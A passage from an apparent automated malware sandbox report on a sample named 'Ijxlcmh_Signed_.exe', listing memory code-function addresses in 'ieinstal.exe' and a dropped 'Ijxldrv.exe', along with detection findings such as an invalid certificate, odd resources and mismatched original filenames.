(x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D020A8 2_2_04D020A8 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04CF1002 2_2_04CF1002 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D0E824 2_2_04D0E824 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04C3F900 2_2_04C3F900 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04C54120 2_2_04C54120 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D022AE 2_2_04D022AE Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04CFDBD2 2_2_04CFDBD2 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04C6EBB0 2_2_04C6EBB0 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_04D02B28 2_2_04D02B28 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_1042E81B 2_2_1042E81B Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_10411026 2_2_10411026 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_10411030 2_2_10411030 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_1042D8D7 2_2_1042D8D7 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_1042D166 2_2_1042D166 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_1042E360 2_2_1042E360 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_10412D87 2_2_10412D87 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_10412D90 2_2_10412D90 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_10419E2B 2_2_10419E2B Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_10419E30 2_2_10419E30 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_1042D779 2_2_1042D779 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_10412FB0 2_2_10412FB0 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 7_3_02219291 7_3_02219291 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 7_3_02218690 7_3_02218690 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 7_3_02218698 7_3_02218698 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 7_3_02223D9C 7_3_02223D9C Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 7_3_0220B340 7_3_0220B340 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 7_3_0220B348 7_3_0220B348 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 12_3_02689291 12_3_02689291 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 12_3_02688698 12_3_02688698 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 12_3_02688690 12_3_02688690 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 12_3_02693D9C 12_3_02693D9C Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 12_3_0267B340 12_3_0267B340 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exe Code function: 12_3_0267B348 12_3_0267B348
 Found potential string decryption / allocating functions Show sources
 Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 04C3B150 appears 35 times
 PE / OLE file has an invalid certificate Show sources
 Source: Ijxlcmh_Signed_.exe Static PE information: invalid certificate
 PE file contains strange resources Show sources
 Source: Ijxlcmh_Signed_.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST Source: Ijxlcmh_Signed_.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST Source: Ijxlcmh_Signed_.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST Source: Ijxlcmh_Signed_.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST Source: Ijxldrv.exe.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST Source: Ijxldrv.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST Source: Ijxldrv.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST Source: Ijxldrv.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Sample file is different than original file name gathered from version info Show sources
 Source: Ijxlcmh_Signed_.exe, 00000000.00000002.253344471.0000000003810000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Ijxlcmh_Signed_.exe Source: Ijxlcmh_Signed_.exe, 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameICb.exe, vs Ijxlcmh_Signed_.exe Source: Ijxlcmh_Signed_.exe, 00000000.00000002.253367376.0000000003990000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Ijxlcmh_Signed_.exe Source: Ijxlcmh_Signed_.exe Binary or memory string: OriginalFilenameICb.exe, vs Ijxlcmh_Signed_.exe
 Tries to load missing DLLs Show sources